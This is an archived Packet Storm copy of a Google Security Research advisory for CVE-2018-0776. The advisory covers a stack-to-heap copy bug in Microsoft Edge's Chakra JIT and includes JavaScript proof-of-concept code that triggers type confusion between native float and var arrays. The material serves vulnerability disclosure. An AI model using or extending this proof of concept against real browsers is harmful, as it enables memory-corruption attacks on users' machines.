exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Edge Chakra JIT Stack-To-Heap Copy Bug

Microsoft Edge Chakra JIT Stack-To-Heap Copy Bug
Posted Jan 18, 2018
Authored by Google Security Research, lokihardt

Microsoft Edge Chakra JIT suffers from a stack-to-heap copy bug.

tags | exploit
advisories | CVE-2018-0776
SHA-256 | a1676ee18b08a013b47916fe92086dcbe4bcd51909427cb9e5b3b106e5024a96

Microsoft Edge Chakra JIT Stack-To-Heap Copy Bug

Change Mirror Download
Microsoft Edge: Chakra: JIT: stack-to-heap copy bug 

CVE-2018-0776


If variables don't escape the scope, the variables can be allocated to the stack. However, there are some situations, such as when a bailout happens or accessing to arguments containing stack-allocated variables, where those variables should not exist in the stack. In these cases, the stack-allocated variables are copied to the heap. This is performed by the "*::BoxStackInstance" methods.

Here's an example.
function inlinee() {
return inlinee.arguments[0];
}

function opt() {
let stack_arr = [];
// allocate segment to the heap
for (let i = 0; i < 100; i++)
stack_arr[i] = 0;

let heap_arr = inlinee(stack_arr);
heap_arr[0] = 2;

print(stack_arr[0]);
}

function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}

main();

"stack_arr" is allocated in the stack. When accessing "inlinee.arguments", the stack-allocated variable gets copied to the heap. Therefore, the copied-heap-variable "heap_arr" has the same structure with "stack_arr". The code shows that the two variables share the same buffer by printing out "2". This means, even if one of those arrays' type changes, the other array can access the same buffer with the previous type.

PoC:
function inlinee() {
return inlinee.arguments[0];
}

function opt(convert_to_var_array) {
/*
To make the in-place type conversion happen, it requires to segment.
*/

let stack_arr = []; // JavascriptNativeFloatArray
stack_arr[10000] = 1.1;
stack_arr[20000] = 2.2;

let heap_arr = inlinee(stack_arr);
convert_to_var_array(heap_arr);

stack_arr[10000] = 2.3023e-320;

return heap_arr[10000];
}

function main() {
for (let i = 0; i < 10000; i++) {
opt(new Function('')); // Prevents to be inlined
}

print(opt(heap_arr => {
heap_arr[10000] = {}; // ConvertToVarArray
}));
}

main();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close